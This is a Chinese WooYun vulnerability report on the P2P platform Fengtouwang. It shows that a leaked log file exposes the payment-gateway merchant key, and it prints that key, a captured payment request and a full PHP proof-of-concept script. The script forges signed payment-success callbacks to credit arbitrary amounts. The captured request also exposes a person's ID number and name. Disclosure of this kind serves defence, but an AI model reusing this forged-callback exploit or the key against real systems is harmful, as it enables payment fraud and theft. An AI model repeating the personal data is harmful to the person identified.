当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0132961

漏洞标题:P2P丰投网支付接口敏感信息泄漏可导致任意金额充值(刷钱洞)

相关厂商:丰投网

漏洞作者: 秋风

提交时间:2015-08-10 10:52

修复时间:2015-09-24 10:54

公开时间:2015-09-24 10:54

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-10: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-09-24: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

@301 我是来给你拉客户的。
我手机号被第三方屏蔽了?咋好多平台我注册的时候都收不到雁阵吗T.T

详细说明:

参考资料: WooYun: 爱贷网高隐匿任意金额充值实战¥0成本从充值到提现全过程回放
参考资料:http://open.lianlianpay.com/
泄漏log文件:http://www.fengtouwang.com/log.txt

签名原串:bank_code=03080000&busi_partner=101001&dt_order=20150513113540&id_type=0&money_order=1&name_goods=充值&no_order=2015051339125&notify_url=http://www.fengtouwang.com/api/llpaycz/notify_url.php&oid_partner=201505111000320502&sign_type=MD5&timestamp=20150513113540&url_return=http://www.fengtouwang.com/api/llpaycz/return_url.php&user_id=8&userreq_ip=10_10_246_110&valid_order=10080&version=1.0&key=201505111000320502_ftouw_513113406
签名:143c8526635248668fa3c9c02978b3c3
签名原串:bank_code=03040000&busi_partner=101001&dt_order=20150513113611&id_type=0&money_order=90&name_goods=充值&no_order=2015051365032&notify_url=http://www.fengtouwang.com/api/llpaycz/notify_url.php&oid_partner=201505111000320502&sign_type=MD5&timestamp=20150513113611&url_return=http://www.fengtouwang.com/api/llpaycz/return_url.php&user_id=43&userreq_ip=10_10_246_110&valid_order=10080&version=1.0&key=201505111000320502_ftouw_513113406
签名:81ec6b5fd9cb68a891854189aee10b20
签名原串:bank_code=64296510&busi_partner=101001&dt_order=20150513131605&id_type=0&money_order=100&name_goods=充值&no_order=2015051315692&notify_url=http://www.fengtouwang.com/api/llpaycz/notify_url.php&oid_partner=201505111000320502&sign_type=MD5&timestamp=20150513131605&url_return=http://www.fengtouwang.com/api/llpaycz/return_url.php&user_id=35&userreq_ip=10_10_246_110&valid_order=10080&version=1.0&key=201505111000320502_ftouw_513113406
签名:71e54ae549490aeb912ca407cfd7d27b


商户KEY:201505111000320502_ftouw_513113406
测试订单号:2015081001331054196
支付提交抓包记录
============================

POST /payment/authpay.htm HTTP/1.1
Host: yintong.com.cn
Connection: keep-alive
Content-Length: 1092
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.fengtouwang.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://www.fengtouwang.com/user.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: _OkLJ_%UJ=******; JSESSIONID=8E54EF0480189B1176F8B0A78E813178; sessionId=2145249E3061548E607DDE1CDC4BA5EE; _pk_ref.3.50cc=%5B%22%22%2C%22%22%2C1439054730%2C%22http%3A%2F%2Fwww.feiyudai.com%2FPay-llpay%3FbankCode%3Dllpay%26t_money%3D50000%26bank_num%3D22222222222%22%5D; _pk_id.3.50cc=ad3632b46de3c3da.1438976371.4.1439054730.1439054730.
version=1.0&oid_partner=201505111000320502&user_id=马赛克&timestamp=20150810013310&sign_type=MD5&sign=0afabc124639149798d657b2b417902a&busi_partner=101001&no_order=2015081001331054196&dt_order=20150810013310&name_goods=%E5%85%85%E5%80%BC&info_order=&money_order=1000&notify_url=http%3A%2F%2Fwww.fengtouwang.com%2Fapi%2Fllpayrz_cz%2Fnotify_url.php&url_return=http%3A%2F%2Fwww.fengtouwang.com%2Fapi%2Fllpayrz_cz%2Freturn_url.php&userreq_ip=10_10_246_110&url_order=&valid_order=10080&bank_code=&pay_type=&no_agree=&shareing_data=&risk_item=%7B%22user_info_mercht_userno%22%3A%229019%22%2C%22user_info_bind_phone%22%3A%22马赛克%22%2C%22user_info_dt_register%22%3A%2220150809173009%22%2C%22user_info_full_name%22%3A%22%E7%8E%8B%E8%93%89%E8%93%89%22%2C%22user_info_id_type%22%3A%220%22%2C%22user_info_id_no%22%3A%22610104198212296167%22%2C%22user_info_identify_state%22%3A%221%22%2C%22user_info_identify_type%22%3A%224%22%2C%22frms_ware_category%22%3A%222009%22%7D&id_type=0&id_no=610104198212296167&acct_name=%E7%8E%8B%E8%93%89%E8%93%89&flag_modify=&card_no=2222222222222222222&back_url=


复制抓到的post数据,直接放置到最后的poc文件即可

漏洞证明:

2222.jpg


POC代码:
php payway.php
{'ret_code':'0000','ret_msg':'交易成功'}

<?php
// 模拟第三方支付向服务器发包
// 自行修改商户私密KEY,以及抓包的字符串,其它代码不要动。
// 代码已做兼容处理,web支付和wap支付已做过测试。app的后边有实际案例我再加。
// 我是商户私密KEY
define("KEY", '201505111000320502_ftouw_513113406');
// 支付抓包的值放到这里
$str = <<<STR
抓包内容放这里
STR;
// ====================以下代码不必修改=================================
$arr = json_decode($str, true);
if (json_last_error()) {
$str = urldecode($str);
parse_str($str, $str);
$str = json_encode($str);
$arr = json_decode($str, true);
}
$acct_name = $arr['acct_name'];//真实姓名
$id_no = $arr['id_no']; // 身份证号
$no_agree = $arr['no_agree']; // 签约协议号
$info_order = $arr['info_order']; // 订单描述信息
$money_order = $arr['money_order']; // 交易金额
$no_order = $arr['no_order']; // 商户唯一订单号
$dt_order = $arr['dt_order']; // 商户订单时间
$sign_type = $arr['sign_type']; // 签名方式
$oid_partner = $arr['oid_partner']; // 商户唯一编号
$pay_type = $arr['pay_type'] == '1' ? 1 : 2; // 2:快捷支付 (默认)D:认证支付
$bank_code = isset($arr['bank_code']) ? $arr['bank_code'] : ""; // 银行代码
$settle_date = date("Y-m-d"); // 清算日期
$result_pay = 'SUCCESS'; // 支付结果
$oid_paybill = ''; // 连连支付支付单号
$id_type = 0;
$key = KEY;
// 签名
$_acct_name = unicode_encode($acct_name, 'utf-8', true, 'u', '');
$_acct_name = $_acct_name == 'u' ? "" : $_acct_name;
$_info_order = unicode_encode($info_order, 'utf-8', true, 'u', '');
$_info_order = $_info_order == 'u' ? "" : $_info_order;
$sign = "info_order={$_info_order}&bank_code={$bank_code}&acct_name={$_acct_name}&dt_order={$dt_order}&id_no={$id_no}&id_type={$id_type}&money_order={$money_order}&no_agree={$no_agree}&no_order={$no_order}&oid_partner={$oid_partner}&pay_type={$pay_type}&result_pay={$result_pay}&settle_date={$settle_date}&sign_type={$sign_type}";
parse_str($sign, $sign);
$sign = paraFilter($sign);
ksort($sign);
reset($sign);
echo $sign = createLinkstring($sign) . "&key={$key}";
echo "\n";
echo $sign = md5($sign); // 签名
$url = $arr['notify_url']; // 商户后台通知地址
$fields = json_encode(array(
'oid_partner' => $oid_partner,
'sign_type' => $sign_type,
'sign' => $sign,
'dt_order' => $dt_order,
'no_order' => $no_order,
'oid_paybill' => $oid_paybill,
'money_order' => $money_order,
'result_pay' => $result_pay,
'settle_date' => $settle_date,
'info_order' => $info_order,
'pay_type' => $pay_type,
'bank_code' => $bank_code,
'no_agree' => $no_agree,
'id_type' => $id_type,
'id_no' => $id_no,
'acct_name' =>$acct_name,
));
$fields = (is_array($fields)) ? http_build_query($fields) : $fields;
print_r($fields);
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'POST');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Length: ' . strlen($fields)));
curl_setopt($ch, CURLOPT_POSTFIELDS, $fields);
curl_setopt($ch, CURLOPT_POSTFIELDS, $fields);
$re=curl_exec($ch);
curl_close($ch);
echo $re;
/**
* 除去数组中的空值和签名参数
* @param $para 签名参数组
* return 去掉空值与签名参数后的新签名参数组
*/
function paraFilter($para) {
$para_filter = array();
while (list ($key, $val) = each ($para)) {
if($key == "sign" || $val == "")continue;
else $para_filter[$key] = $para[$key];
}
return $para_filter;
}
/**
* 汉字转Unicode编码
* @param string $str 原始汉字的字符串
* @param string $encoding 原始汉字的编码
* @param boot $ishex 是否为十六进制表示(支持十六进制和十进制)
* @param string $prefix 编码后的前缀
* @param string $postfix 编码后的后缀
*/
function unicode_encode($str, $encoding = 'UTF-8', $ishex = false, $prefix = '&#', $postfix = ';') {
$str = iconv($encoding, 'UCS-2', $str);
$arrstr = str_split($str, 2);
$unistr = '';
for($i = 0, $len = count($arrstr); $i < $len; $i++) {
$dec = $ishex ? bin2hex($arrstr[$i]) : hexdec(bin2hex($arrstr[$i]));
$unistr .= $prefix . $dec . $postfix;
}
return $unistr;
}
/**
* 把数组所有元素,按照“参数=参数值”的模式用“&”字符拼接成字符串
* @param $para 需要拼接的数组
* return 拼接完成以后的字符串
*/
function createLinkstring($para) {
$arg = "";
while (list ($key, $val) = each ($para)) {
$arg.=$key."=".$val."&";
}
$arg = substr($arg,0,count($arg)-2);
//如果存在转义字符,那么去掉转义
if(get_magic_quotes_gpc()){$arg = stripslashes($arg);}
return $arg;
}
/* End of file */

修复方案:

1.WEB根目录权限不要777,尽量不给写入权限。
2.删除相关log记录代码
3.删除log.txt文件
4.找厂商修改相关私密KEY(不改后边被人利用我不负责的噢)
5.避免那个啥风险,提现我就不测了,点到为止。
6.麻烦帮我把我的账号注销掉。

版权声明:转载请注明来源 秋风@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)